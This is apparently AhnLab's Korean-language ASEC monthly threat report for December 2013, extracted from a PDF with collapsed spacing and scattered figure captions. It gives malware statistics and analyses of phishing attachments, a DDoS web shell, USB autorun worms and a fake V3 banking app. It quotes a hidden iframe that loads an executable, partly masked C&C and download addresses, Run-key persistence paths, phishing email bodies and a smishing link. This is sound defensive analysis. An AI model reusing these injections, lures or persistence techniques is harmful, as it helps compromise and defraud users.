CONTENTS ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된글로벌보안조직입니다. 이리포트는 안랩의 ASEC에서작성하며, 매월발생한주요보안위협과이슈에대응하는최신보안

ASEC REPORT VOL.48 2013.12

CONTENTS ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된글로벌보안조직입니다. 이리포트는 안랩의 ASEC에서작성하며, 매월발생한주요보안위협과이슈에대응하는최신보안기술에대한요약정보를담고있습니다. 자세한내용은안랩닷컴 (www.ahnlab.com) 에서확인하실수있습니다. 2013 년 12 월보안동향 악성코드동향 01. 악성코드통계 03 02. 악성코드이슈 07 - 특정인을대상으로유포된스피어피싱메일발견 - 보안메시지로위장한스팸메일 - 햇살론부결자문서파일로위장한악성코드 - 웹셸을이용한 DDoS 공격 - 아메리칸항공 (American Airlines) 메일로위장한스팸메일 - USB에생성되는바로가기파일 #2 - 다운로드기능이포함된오토런악성코드 - 미인대회우승자이력서를위장한악성코드 03. 모바일악성코드이슈 16 - 백신앱을가장한악성앱주의 보안동향 01. 보안통계 18-12 월마이크로소프트보안업데이트현황 02. 보안이슈 19 - 상용키로거의무분별한사용 - 중국인터넷블랙마켓, 사이버범죄서비스정찰제시행 웹보안동향 01. 웹보안통계 20

3 악성코드동향 01. 악성코드통계 트로이목마여전히높은비중 ASEC 이집계한바에따르면, 2013 년 12 월에감염이보고된악성코드는 174 만 5450 건으로나 타났다. 이는전월 206 만 6944 건에비해 32 만 1494 건이감소한수치다 ([ 그림 1-1]). 이중가 장많이보고된악성코드는 Win-Trojan/Patched.kg 이었으며, Textimage/Autorun 과 Als/Bursted 가다음으로많았다. 또한총 4 건의악성코드가최다 20 건목록에새로이름을올렸다 ([ 표 1-1]). 그림 1-1 월별악성코드감염보고건수변화추이 15,000,000 5,000,000 0 2,339,014 2,066,944 1,745,450 0.88% 11.6% 15.6% 10 11 12 표 1-1 2013년 12월악성코드최다 20건 ( 감염보고악성코드명기준 ) 순위 등락 악성코드명 건수 비율 1 Win-Trojan/Patched.kg 258,661 34.9 % 2 Textimage/Autorun 72,207 9.7 % 3 Als/Bursted 55,701 7.5 % 4 RIPPER 34,460 4.7 % 5 Trojan/Win32.fraudl 33,390 4.5 % 6 2 Win-Trojan/Wgames.Gen 31,235 4.2 % 7 Trojan/Win32.adh 29,252 3.9 % 8 2 JS/Agent 25,404 3.4 % 9 6 BinImage/Host 24,759 3.3 % 10 1 Win32/Autorun.worm.307200.F 20,952 2.8 % 11 Trojan/Win32.agent 18,928 2.6 % 12 NEW Downloader/Win32.delf 17,177 2.3 % 13 4 ASD.PREVENTION 17,050 2.3 % 14 NEW Trojan/Win32.banker 16,882 2.3 % 15 NEW Malware/Win32.generic 15,859 2.1 % 16 2 Gif/Iframe 15,585 2.1 % 17 4 Trojan/Win32.keygen 15,280 2.1 % 18 6 Win-Trojan/Agent.21734801 14,592 2 % 19 1 Win-Trojan/Malpacked5.Gen 12,849 1.7 % 20 NEW VBS/Agent 11,517 1.6 % TOTAL 741,740 100.0 %

4 악성코드대표진단명감염보고최다 20 [ 표 1-2] 는악성코드별변종을종합한악성코드대표진단명중가장많이보고된 20 건을추린것이다. 이중 Win-Trojan/Patched 가총 27 만 3086 건으로가장빈번히보고된것으로조사됐다. Trojan/Win32 는 20 만 9669 건, Win-Trojan/Agent 는 8 만 4602 건을각각기록해그뒤를이었다. 표 1-2 악성코드대표진단명최다 20건 순위 등락 악성코드명 건수 비율 1 Win-Trojan/Patched 273,086 24.3 % 2 Trojan/Win32 209,669 18.7 % 3 Win-Trojan/Agent 84,602 7.5 % 4 Textimage/Autorun 72,224 6.4 % 5 Als/Bursted 55,701 5 % 6 Win-Trojan/Onlinegamehack 43,975 3.9 % 7 Win32/Conficker 38,677 3.5 % 8 Win32/Autorun.worm 36,348 3.2 % 9 RIPPER 34,460 3.1 % 10 5 Win-Trojan/Wgames 31,235 2.8 % 11 1 Win-Trojan/Downloader 29,529 2.6 % 12 Win32/Kido 28,858 2.6 % 13 NEW Downloader/Win32 28,787 2.6 % 14 Win32/Virut 27,097 2.4 % 15 2 JS/Agent 25,470 2.3 % 16 2 BinImage/Host 24,759 2.2 % 17 NEW Malware/Win32 23,634 2.1 % 18 7 Adware/Win32 20,331 1.8 % 19 NEW ASD 17,050 1.5 % 20 NEW Packed/Win32 16,346 1.5 % TOTAL 1,121,838 100.0 % 신종악성코드, 트로이목마가 96% [ 표 1-3] 은 12 월에신규로접수된악성코드중감염보고가가장많았던 20 건을꼽은것이다. 12 월의신종악성코드중최다는트로이목마류로, Win-Trojan/Urelas.247969 가 3440 건으로전체의 20.8%, 그뒤를이어 Win-Trojan/Onlinegamehack.117760.U 가 2627 건으로 15.8% 를차지했다. 표 1-3 12월신종악성코드최다 20건 순위 악성코드명 건수 비율 1 Win-Trojan/Urelas.247969 3,440 20.8 % 2 Win-Trojan/Onlinegamehack.117760.U 2,627 15.8 % 3 Win-Trojan/Onlinegamehack.271455 1,616 9.7 % 4 Win-Trojan/Agent.222572 1,437 8.7 % 5 Win-Trojan/Onlinegamehack.251513 1,327 8 % 6 Win-Trojan/Banker.24656 927 5.6 % 7 Win-Trojan/Onlinegamehack.269988 921 5.6 % 8 Win-Trojan/Msidebar.1897366 805 4.9 % 9 TextImage/Host 681 4.1 % 10 Win-Trojan/Inject.322249 553 3.3 % 11 Dropper/Magania.41271296 403 2.4 % 11 Dropper/Banker.833024 396 2.4 % 13 Dropper/Magania.86103040 267 1.6 % 14 Win-Trojan/Onlinegamehack.342801 258 1.6 % 15 Win-Trojan/Banki.23552.C 240 1.4 % 16 Win-Trojan/Zlob.113362 220 1.3 % 17 Win-Trojan/Gupboot.349970 153 0.9 % 18 Dropper/Onlinegamehack.117299 121 0.7 % 19 Dropper/Magania.86113280 101 0.6 % 20 Win-Trojan/Backdoor.169873 83 0.5 % TOTAL 16,576 100.0 %

5 12 월도트로이목마가강세 [ 그림 1-2] 는 2013 년 12 월한달간안랩고객으로부터감염이보고된악성코드의유형별비율을 집계한결과다. 트로이목마가 54.8% 로가장높은비율을나타냈고웜은 8.4%, 스크립트는 7.9% 의 비율을각각차지했다. 그림 1-2 악성코드유형별비율 악성코드유형별감염보고전월비교 [ 그림 1-3] 은악성코드유형별감염비율을전월과비교한것이다. 스크립트, 익스플로이트, 다운로 더가전월에비해증가세를보이고있는반면트로이목마, 애드웨어, 드롭퍼는전월에비해감소한 것을볼수있다. 웜, 바이러스, 스파이웨어, 앱캐어계열들은전월수준을유지했다. 그림 1-3 2013 년 11 월 vs. 2013 년 12 월악성코드유형별비율

6 신종악성코드유형별분포 12 월의신종악성코드를유형별로살펴보면트로이목마가 87% 로가장많았고드롭퍼가 9% 로집 계됐다. 그림 1-4 신종악성코드유형별분포

7 악성코드동향 02. 악성코드이슈 특정인을대상으로유포된스피어피싱메일발견신뢰할만한발신인으로위장해발송된스피어피싱메일이발견돼주의가요구된다. 이번에발견된스피어피싱메일은한글취약점을이용하는악성코드가첨부돼있으며첨부파일을실행할경우악성코드에감염된다. 한글취약점을통해생성되는악성코드는다음과같은경로에생성된다. 그림 1-7 파일생성정보 해당악성코드는윈도시작레지스트리 (RunOnce) 에등록돼동작한다. 그림 1-8 윈도시작레지스트리등록 그림 1-5 스피어피싱메일 메일에첨부된한글파일을실행하면사용자가악성코드감염사실을인지하지못하도록한글문서가나타난다. 악성코드는정보를유출하기위한목적으로시스템정보등을탈취하는데이용될것으로추정된다. 특정서버 (210.XX.XXX.4) 로접근을시도하지만, 분석당시에는연결되지않았다. 그림 1-9 네트워크연결정보 V3 제품에서는관련악성코드들을다음과같이진단한다. 그림 1-6 첨부파일실행화면

8 <V3 제품군의진단명 > HWP/Exploit (2013.12.17.02) Trojan/Win32.Agent (2013.12.17.02) 보안메시지로위장한스팸메일해외에서택배업체로위장한스팸메일로많이사용되는이름은 DHL, 페덱스등우리에게많이알려진다국적물류회사들의이름이다. 이번에발견된사례는 AMEX(American Express) 라는업체의이름을사용한스팸메일이다. 아래파일을시작프로그램에등록시켜부팅때마다실행해감염상태를유지하도록한다. [ 시작프로그램등록 ] C:\Documents and Settings\Administrator\Application Data\ Tielam\rygexu.exe 그리고 explorer.exe 프로세스의방화벽차단을해제하고, UDP 3532 포트와 TCP 2291 포트를개방한다. [ 그림 1-12] 와같이방화벽차단메시지가뜬다. 이때차단해제가아닌계속차단을클릭하는것이중요하다. 그림 1-10 보안메시지로위장한스팸메일 수신된메일의내용을확인해보면암호화된보안파일을첨부했다는메시지를확인할수있다. 해당첨부파일은 SecureMail.zip 이라는이름으로된 zip 압축파일이다. 해당압축파일은암호압축이돼있지않으며, 압축을풀면 [ 그림 1-11] 과같은 PDF 아이콘을확인할수있다. 그림 1-12 악성코드감염시출력되는윈도방화벽메시지 그리고아래 IP 로지속적인접근을시도한다. 그림 1-11 PDF 파일아이콘으로위장한응용프로그램 파일아이콘을 PDF 파일로하여사용자로하여금 PDF 파일로생각하게하지만, 실제로는실행가능한 exe 파일로사용자의실행을유도한다. 해외에서도대부분 PDF 문서를확인하기위해어도비의아크로뱃리더프로그램을사용한다. 실행파일의아이콘을어도비의아이콘으로바꿔놓으면사용자들이의심하지않고클릭하는점을노린것이다. [ 감염시생성하는파일 ] C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\htiof.exe C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\CabF.tmp C:\Documents and Settings\Administrator\Local Settings\ Temporary Internet Files\Content.IE5\KYLW251C\html[1].exe C:\Documents and Settings\Administrator\Application Data\ Tielam\rygexu.exe C:\Documents and Settings\Administrator\Local Settings\ Application Data\upze.zay C:\Documents and Settings\Administrator\Application Data\ Microsoft\Address Book \Administrator.wab C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\KMUF38B\update.exe [ 접속시도 IP] 6*.***.***.122:443 11*.***.***.245:4758 17*.***.***.122:7062 9*.***.***.180:1950 6*.***.***.31:5902 9*.***.***.74:9386 9*.***.***.26:5835 17*.***.***.184:80 5*.***.***.1:80 18*.***.***.45:80 얼마전이슈가됐던크립토락커 (CryptoLocker) 랜섬웨어악성코드의주요확산경로는스팸메일의첨부파일이었다. 또한스미서 (Smiscer, ZeroAccess) 루트킷악성코드의주요확산경로역시스팸메일의첨부파일이었다. 이번에발견된악성코드역시스팸메일의첨부파일로확산되고있다. V3 제품에서는관련악성코드를아래와같이진단한다. <V3 제품군의진단명 > Trojan/Win32.Bublik (2013.11.21.03) Trojan/Win32.Bublik (2013.11.21.04)

9 햇살론부결자문서파일로위장한악성코드지난 12월에발견된대출상품으로위장한악성코드는햇살론부결자라는개인정보가포함돼이메일을통해유포된것으로보고됐다. 햇살론은 2010년 7월출시된정부보증대출상품으로대부업의 30~40% 대고금리대신, 저신용저소득서민에게 10% 대의저금리로대출을해주는서민대출상품이다. 햇살론부결자list.rar 압축파일이메일에첨부돼유포, 압축파일을풀면아래그림과같이엑셀문서파일이라는것을확인할수있다. [ 파일생성 ] C:\Documents and Settings\[ 사용자이름 ]\Local Settings\ Temp\RarSFX0\ 새 Microsoft Office Excel 워크시트.xlsx C:\Documents and Settings\[ 사용자이름 ]\Local Settings\ Temp\RarSFX0\11.exe C:\Documents and Settings\[ 사용자이름 ]\Application Data\bs_ stealth.exe [ 레지스트리등록 ] [HKEY_CURRENT_USER\Software\Microsoft\Windows\ CurrentVersion\Run] bs_stealth="c:\documents and Settings\[ 사용자이름 ]\ Application Data\bs_stealth.exe" 그림 1-13 압축해제된파일이파일의종류는응용프로그램으로확인된다. 이는유니코드를이용하여확장자를변조한것으로, 사용자가문서파일로오인해서실행하도록유도하는것이다. 생성된파일중 새마이크로소프트오피스엑셀워크시트.xlsx 파일은개인정보가포함된정상엑셀문서파일이며, 11.exe 파일과 bs_stealth.exe 파일과동일한파일이다. bs_stealth.exe 파일은백도어로동작하며, 자신과동일한경로에위치한 bs_stealth.dat 파일에아래그림과같이사용자가입력한키보드입력값을저장하는키로거이다. 그림 1-14 명령프롬프트에서확인한압축해제된파일 해당파일실행시 [ 그림 1-15] 와같이개인정보가담긴허위엑셀문서를실행하기때문에사용자는악성코드감염을인식하지못한다. 그림 1-16 bs_stealth.dat 파일내용 ( 키로깅 ) bs_stealth.exe 파일은아래도메인에주기적으로접속을시도한다. admin.k****s.com:2002 (112.1**.**7.10) 정상연결시에는키로깅데이터가전송되고공격자에의해시스템이장악될수있어주의가요구된다. <V3 제품군의진단명 > Trojan/Win32.Dropper (2013.11.22.01) Trojan/Win32.Injector (2013.11.28.04) 웹셸을이용한 DDoS 공격 그림 1-15 햇살론부결자 허위개인정보가담긴엑셀문서이엑셀문서에는총 494명의이름, 휴대폰번호, 회사명이나직업과같은허위개인정보가포함돼있다. 파일실행시아래와같은파일을생성하고시스템시작시자동실행되도록레지스트리에등록한다. 국내모기업의그룹웨어서버에서악성코드가유포된사실이지난 11 월발견됐다. 당시이악성코드는그룹웨어웹서버의 index.html 페이지에아래와같이 iframe 코드가삽입돼유포된것으로보고됐다. <iframe src= http://117.***.1**.30:6655/serve.exe width=0 height=0>

10 그룹웨어는기업내인프라중직원들이가장많이사용하는시스템이다. 공격자가공격대상기업의그룹웨어서버의취약점을알게된다면워터링홀공격기법으로표적공격을감행할수있을것이다. 이러한공격을예방하려면내부직원들만이용하는인프라는외부접근이불가하도록방화벽을적용해야한다. 불가피하게외부에서접근이필요한경우에는 VPN을통해접근할수있도록하는것이바람직하다. 당시유포된악성코드는아래와같은경로에파일을생성하고, 자동으로실행되도록레지스트리에서비스로등록하고, C&C 서버로추정되는 IP로접속을시도했다. C:\Program Files\< 랜덤폴더명 >\svchost.exe HKLM\SYSTEM\ControlSet001\Services\Windows Test 5.0\ImagePath "C:\ProgramFiles\eissic\svchost.exe 공격대상의 IP 주소, 포트, 프로토콜타입, 데이터, 카운트, 스레드정보를인자값으로받아 DDoS 공격이수행된것이었다. 그림 1-19 UDP 패킷발생원인정보그룹웨어서버에서수집한 **x.jsp 파일에서받는인자값은다음과같다. 1. IP 공격자가지정한 IP, 포트, 데이터, 프로토콜타입, 카운트스레드의인자값을전달받아카운트에지정된시간 ( 초 ) 동안한번에스레드에해당되는수만큼공격을수행한다. 117.***.1**.30:77 이후해당서버에서 UDP 플러딩 (Flooding) 패킷이발생, 내부방화벽이다운되는문제가발생했음이보고됐다. 분석결과, UDP 플러딩은 [ 그림 1-17] 의 IPS 탐지로그와같이대상지는불특정 IP였고공격지는내부그룹웨어서버 IP로확인됐다. 그림 1-20 **x.jsp 파일내용 (1) 그림 1-17 UDP 플러딩 IPS 탐지로그 2. CMD OS 확인후윈도와윈도가아닌 OS를구분하여공격자로부터실행시킬프로세스나셸을전달받아실행한다. 그러나그룹웨어서버를점검한당시에는악성코드감염여부가확인되지않아해당서버에서발생하는패킷을캡처하여 UDP 플러딩이발생한시점의네트워크패킷을분석했다. 그림 1-21 **x.jsp 파일내용 (2) 그림 1-18 UDP 플러딩 IPS 탐지로그수집된패킷중특정공격대상지의 UDP 패킷은약 60Mbit/sec, 90초동안 5.27Gbit 패킷을발생시켰다. 최초 UDP 패킷발생시점이전에아래그림과같이그룹웨어서버의 **x.jsp 페이지를통해 UDP 패킷이발생한것으로확인됐다. 경유지로이용된국내 IP(218.***.1**.46) 에서 3. F 공격자가원하는값을쓴다. 그림 1-22 **x.jsp 파일내용 (3)

11 위인자값중에 CMD와 F 인자값을전달받아공격자가원하는파일을생성하여실행시킬수있다. 해당서버에서특정 FTP 서버에접속하여파일을다운로드받는 BAT 파일이발견됐다. 이웹셸을통해추가악성코드감염이나해당서버에침해가발생했다고볼수있다. 사용자가해당파일을실행할경우다음과같은경로에복사본파일이생성되며윈도시작레지스트리에등록돼동작한다. 그룹웨어서버에취약점이있다보니웹셸이업로드됐고, 이를통해 DDoS 공격이발생했다. 해당서버에웹셸이발견된만큼웹서버에대한소스코드의무결성검사, 취약점점검과조치가필요하다. 그림 1-26 윈도시작레지스트리등록 또한, 사용자가악성코드감염사실을인지하지못하도록에러메시지가사용자에게나타낸다. 그림 1-23 FTP 접속화면 관련악성코드를 V3 제품에서는아래와같이진단한다. <V3 제품군의진단명 > Trojan/Win32.Agent (2013.11.08.01) JS/Webshell(2013.12.16.03) 그림 1-27 에러메시지 해당악성코드는주기적으로특정 C&C 서버에연결을시도한다. 아메리칸항공 (American Airlines) 메일로위장한스팸메일 아메리칸항공 (American Airlines) 메일로위장한스팸메일이발견돼사용자들의주의가요구된다. 스팸메일은전자항공권관련내용이작성되어있으며워드파일을위장한악성코드가첨부돼있다. 그림 1-28 네트워크연결정보 악성코드감염후사용자가수신한유사한형태의스팸메일이다수발송된다. 그림 1-29 스팸메일발송 다음은 TCPView 프로그램으로네트워크트래픽을확인하는화면이다. 그림 1-24 아메리칸항공메일로위장한악성코드유포메일 첨부파일압축을해제하면워드문서를위장한윈도실행 (EXE) 파일이확인된다. 그림 1-25 워드문서를위장한실행파일 그림 1-30 트래픽발생화면

12 V3 제품에서는아래와같이진단한다. <V3 제품군의진단명 > Downloader/Win32.Dofoil (2013.12.11.01) 1) 악성코드에대한진단 / 치료 V3 제품을최신엔진으로업데이트한후 [ 그림 1-33] 과같이사용중인모든드라이브에대해시스템전체검사를수행하고진단된내용에대해치료를수행한다. USB 에생성되는바로가기파일 #2 지난 ASEC Report Vol.47에서는 USB에생성되는바로가기파일이란제목으로, 감염후바로가기아이콘이생성되는 VBS 오토런 (Autorun) 악성코드에대해알아봤다. 이동식저장매체와공유드라이브를통해유포되는관련악성코드특성상빠른확산속도때문인지동일한형태의악성파괴관련문의가다수꾸준하게접수되고있다. 최근접수된스크립트파일 (VBS) 를보면아래와같이형태는조금씩다르다. 그림 1-33 V3 검사대상설정및치료확인 2) 폴더옵션변경 숨겨진폴더및파일에대한확인을위해폴더속성을변경한다 ([ 그림 1-34]). 그림 1-31 인코딩된스크립트파일 (VBS) 그러나인코딩된형태에차이가있으나디코딩후코드를확인해보면접속하는서버의도메인및포트정보에만차이가있을뿐이후코드들은모두동일한것임을확인할수있다. 그림 1-34 폴더옵션변경 3) 바로가기파일삭제 그림 1-32 디코딩된스크립트파일 (VBS) 윈도탐색기에서 종류 열을클릭하면파일들이종류별로정렬이된다. 여기에서 바로가기 파일들을선택한후마우스오른쪽버튼클릭후다음메뉴에서삭제를선택한다. 악성코드의동작과관련된내용에대해서는지난글을통해확인했으므로이후에는조치방법에대해알아보도록하겠다. 관련악성코드에감염된후백신제품을통해진단 / 치료를수행하더라도사용하는이동식저장매체 (USB 메모리, 외장하드등 ) 에바로가기파일만있고정상폴더들이보이지않는증상은여전하다. 이는감염시파일및폴더에대한속성이일부변경되어발생하는증상이다. 이경우속성이변경된폴더및파일들에대해서는설정을변경해주고, 악성코드치료후남아있는찌꺼기파일 ( 바로가기파일 ) 은삭제해야한다. 그림 1-35 바로가기파일삭제

13 4) 폴더및파일속성 ( 숨김 / 시스템 ) 변경 - 속성을변경할드라이브를확인한다. ( 여기서는 E 드라이브 ) - [ 시작 ] >[ 실행 ] 에서 cmd.exe를입력, 명령프롬프트를실행한다. ([ 시작 ] >[ 모든프로그램 ]> [ 보조프로그램 ] > 명령프롬프트에서도실행가능 ) - [ 그림 1-36] 을참고하여대상드라이브로이동한후, attrib 명령을통해속성을변경한다. 오토런은자동실행되는악성코드인만큼 USB를통해전파된다. 감염되면 USB 메모리에도악성코드파일이생성된것을확인할수있다. 특히 [ 숨김 ] 속성으로돼있어숨김파일표시기능을사용하지않으면발견하기어렵다. 그림 1-38 숨김파일로 USB 메모리루트폴더에생성된악성코드 그림 1-36 드라이브확인및 attrib 명령실행 VBS 스크립트악성코드뿐만아니라오토런류의악성코드에대한진단 / 치료이후에기존의폴더나파일이확인되지않고바로가기파일만나타나는경우, 위의내용을참고하여조치하면증상을해결하는데도움이된다. 이와관련, 아래 ASEC블로그내용 (4. 치료후폴더복원방법 ) 을통해서도확인할수있다. 이러한악성코드의경우대부분감염된 PC에 USB를연결하여사용하면서 USB가먼저감염되고, 감염된 USB를감염되지않은 PC에연결하면서확산되는특징이있다. 또한스팸메일의첨부파일이나인터넷상에서떠돌고있는파일들을무심코실행하면서감염되는경우도있으므로사용자의주의가요구하다. 해당악성코드는감염과동시에감염상태를유지하기위해특정폴더에파일을생성하고, 시작프로그램에등록해부팅할때마다실행되도록한다. - http://asec.ahnlab.com/171 V3 제품에서는아래와같이진단한다. <V3 제품군의진단명 > VBS/Dinihou (2013.12.17.02) VBS/Agent (2013.12.18.00) VBS/Dunihi (2013.12.19.01) 그림 1-39 시작프로그램에등록된악성코드 다운로드기능이포함된오토런악성코드이번에발견된오토런악성코드는 USB를통해전파되는오토런악성코드유형에감염시추가악성코드를다운로드하는기능이포함돼있어사용자의주의가요구된다. 이번에발견된오토런악성코드의확장명은 VBE(Visual Basic Encoded Script File) 이다. 따라서실행파일이아닌스크립트파일이기때문에감염된시스템을확인해보면 wscript.exe 프로세스가동작중임을확인할수있다. 그림 1-37 wscript.exe에의해실행되는악성코드 [ 레지스트리등록 ] HKLM\Software\Microsoft\Windows\CurrentVersion\Run\ servieca.vbe HKCU\Software\Microsoft\Windows\CurrentVersion\Run\ servieca.vbe HKLM 및 HKCU 경로모두생성하기때문에현재사용자뿐만아니라 PC에생성된모든사용자계정에영향을준다. [ 파일생성 ] C:\Documents and Settings\Administrator\Local Settings\ Temp\servieca.vbe C:\Documents and Settings\Administrator\ 시작메뉴 \ 프로그램 \ 시작프로그램 \servieca.vbe C:\Documents and Settings\Administrator\Local Settings\ Temporary Internet Files\Content.IE5 \17YMWEFY\systema[1].exe

14 \17YMWEFY\systema[1].exe C:\Documents and Settings\Administrator\Local Settings\ Temp\systema.exe systema.exe 파일은 vbe 파일에감염되면특정 URL로접근해다운로드받아특정폴더로복사된다. 악성코드제작자는사회공학적기법으로메일수신자의호기심을자극함으로써첨부파일을실행시키도록미인대회우승자의이력서를이용한것으로보인다. 메일제목, 본문내용, 첨부파일명은아래와같이유사한형태로유포되고있었다. [ 악성코드다운로드 ] hxxp://www.da***.***/av***ic/systema.exe (1**.2**.5*.2**:80) 생성된파일중 [ 그림 1-38] 과같이 4개의파일은윈도우정상파일인 svchost.exe 프로세스에로드되어동작하면서아래국내 IP로끊임없이접속을시도한다. 해당악성코드에감염되면 PC와 USB를동시에치료하지않으면지속적인재감염이발생하기때문에주의할필요가있다. 모든폴더가숨김으로돼있는경우아래와같이진행한다. 1. 루트폴더에서모든파일 / 폴더를선택하고, 우클릭후속성을클릭한다. 2. [ 확인 ] 버튼상단에존재하는 [ 숨김 (H)] 체크박스를해제한다. 3. [ 확인 ] 버튼을누르면새로운창이뜬다. [ 현재폴더, 하위폴더및파일에적 용 ] 을선택한다. 4. 정상적으로숨김속성이해제되었는지확인한다. 해당악성코드감염을예방하기위해서는아래와같은사항을준수한다. 1. V3 에서제공하는 [CD/USB 드라이브자동실행방지 ] 기능을사용한다. [ 환경설정 ] - [ 고급설정 ] - [CD/USB 드라이브자동실행방지 ] 체크 2. V3 에서제공하는 [USB 드라이브자동검사하기 ] 기능을사용한다. [ 환경설정 ] - [ 고급설정 ] - [USB 드라이브자동검사하기 ] 체크 3. V3 를최신엔진으로업데이트하고실시간감시기능을사용한다. 4. 윈도보안업데이트및각종프로그램을최신버전으로업데이트한다. 5. USB 사용은최대한자제한다. V3 제품에서는아래와같이진단한다. Date: Sun, Dec 22 2013 07:07 AM From: job0553@cos*****e.com Subject: My CV Attached File: My_CV_Please_ Look_Job_ID8589.zip -- Original Message -- Good Day! I sent you my detailed CV. I hope you will like me I am the winner of different beauty contests. My photos are added as images in the document, I need this job very much. Waiting for your soonest reply, Kisses, Ava Smith Date: Sun, Dec 22 2013 11:47 AM From: job7066@arena*****nal. com Subject: My CV Attached File: My_CV_Please_ Look_Job_ID6410.zip -- Original Message -- Hello, I sent you my detailed CV. I hope you will like me I am the winner of different beauty contests. My photos are added as images in the document, I need this job very much. Waiting for your soonest reply, Kisses, Lisa Mason Date: Sun, Dec 22 2013 09:32 AM From: job3410@island*****asino. com Subject: Please look my CV. Thank you Attached File: My_CV_Please_ Look_Job_ID7026.zip -- Original Message -- Hello, I sent you my detailed CV. I hope you will like me I am the winner of different beauty contests. My photos are added as images in the document, I need this job very much. Waiting for your soonest reply, Kisses, Betty Mason Date: Sun, Dec 22 2013 02:23 PM From: job1136@n****d.com Subject: my documents and passport scans Attached File: My_CV_Please_ Look_Job_ID4805.zip -- Original Message -- Hello, I sent you my detailed CV. I hope you will like me I am the winner of different beauty contests. My photos are added as images in the document, I need this job very much. Waiting for your soonest reply, Kisses, Karen Tailor <V3 제품군의진단명 > VBS/Downloader (2013.11.29.04) Trojan/Win32.Infostealer (2013.11.29.01) Trojan/Win32.Miner (2013.12.05.00) 첨부된압축파일을해제하면 [ 그림 1-40] 과같이 MS 워드문서아이콘으로보여무의식적으로실행할수있기때문에주의가요구된다. 해당파일에대한종류를보면 응용프로그램 으로확인할수있어메일에첨부된파일을실행할때는이를간과하지않도록해야한다. 미인대회우승자이력서를위장한악성코드 이력서를위장한악성코드가첨부파일로가장해집중적으로유포되고있는것으로보고됐다. 본문내용에는미인대회우승자이고이력서에사진이포함돼있다면서구직내용과함께악성코드가첨부된채유포되고있었다. 그림 1-40 압축해제한파일

15 압축해제된파일 (My_CV_document. exe) 을실행하면자기복제본을아래와같이랜덤한파일명으로생성하고실행한다. [ 파일생성 ] C:\Documents and Settings\[ 사용자이름 ]\Local Settings\ Application Data\cqhvoevu.exe 이번에발견된이력서위장악성코드는그동안알려진이력서위장악성코드와달리, 정상이력서문서파일은열리지않았다. 대신 [ 그림 1-41] 과같은내용의메모장이실행돼사용자들의악성코드감염을인지하지못하도록한다. 그림 1-41 감염시나타나는에러메시지 cqhvoevu.exe 파일은윈도정상시스템파일인 svchost.exe 프로세스에인젝션돼실행되며, 아래 C&C로추정되는 IP에주기적으로접속한다. 91.1**.2**.4*:8080 202.**.6*.**:8080 77.**.**.*5:8080 190.**4.2**.2*2:443 103.**.2**.3*:8080 5.1**.21*.**4:8080 분석당시추가증상은확인되지않았지만 [ 그림 1-41] 의에러메시지는앞서나타난 American Airlines 메일을위장한스팸메일에러메시지와동일하다. 이것으로보아 C&C 서버에정상연결시추가악성코드감염이나스팸메일발송증상이나타날것으로예상된다. V3에서는아래와같이진단한다. <V3 제품군의진단명 > Trojan/Win32.Agent(2013.12.23.00)

16 악성코드동향 03. 모바일악성코드이슈 지할수있는 API 이다. 위코드에서 SMS 수신함과관련된 URI 가인자로넘어감을확인할수있으며, 이코드가실행된이후부터는악성앱이 SMS 수신함의변화를감지하게된다. 실제앱실행후 SMS를이용, 테스트해보면아래와같이안드로이드노티피케이션 (Notification) 이동작한다. 백신앱을가장한악성앱주의 지속적으로발견되고있는스미싱형태의악성앱이최근에는 V3 앱으로가장해유포된사례가접수됐다. 아래는유포된 SMS로 V3 업데이트를유도하는내용임이확인됐다. [ 알람 ] 고객님은구버전 V3( 백신 ) 사용중이십니다최신버전업데이트 http://iztv.co.kr/ 그림 1-42 스미싱 SMS 그림 1-45 SMS 수신시알림메시지 [ 그림1-45] 는사용자의뱅킹앱을체크한후설치된앱에맞는알림메시지를띄운다. 그러나이과정에서단순히피싱앱방식의형태로화면을띄워최근에주로발견됐던앱삭제후, 악성뱅킹앱을다시설치하는방식과는차이가있다. 위 SMS의 URL로접속하면 V3lite_3.0.1.apk 라는이름의 APK 파일이다운로드되며, 다운로드된앱의특징을살펴보면아래와같다. 해당악성앱은아래와같은아이콘모양 ( 붉은색네모상자 ) 을가진다. 얼핏보기에는정상앱과비슷해보일수있으나자세히보면차이점이있다. 그림 1-46 앱실행화면 (1) 그림 1-43 악성앱아이콘사용자가해당앱을실행하면아이콘은자신을삭제하고동작한다. 앱디컴파일시, 처음실행하는액티비티 (Activity) 를보면 [ 그림 1-44] 와같이콘텐트옵저버 (ContentObserver) API가사용됐음이확인된다. 약관을모두동의하고정보입력후, 확인버튼을누르면아래와같이계좌번호, 계좌비밀번호, 보안카드번호를요구하는화면을확인할수있다. 그림 1-44 인덱스액티비티클래스코드 콘텐트옵저버 API 는 URI 를인자로받아인자로넘긴 URI 의변화를감 그림 1-47 앱실행화면 (2)

17 [ 그림 1-47] 실행화면에서도확인할수있듯이실행앱은과거에다수발견된피싱앱의형태이며, 위와같은악성앱으로인한피해를예방하려면안정성이확인되지않은 apk( 앱 ) 을다운로드받지않으면된다. 또한앱설치는반드시공식마켓을이용하고, 추가로 안전한문자와같은스미싱을예방할수있는앱을이용하는방법을권장한다. 해당악성코드는 V3 Mobile 제품을통해진단및치료가가능하다. <V3 제품군의진단명 > Android-Trojan/Bankun.D6161

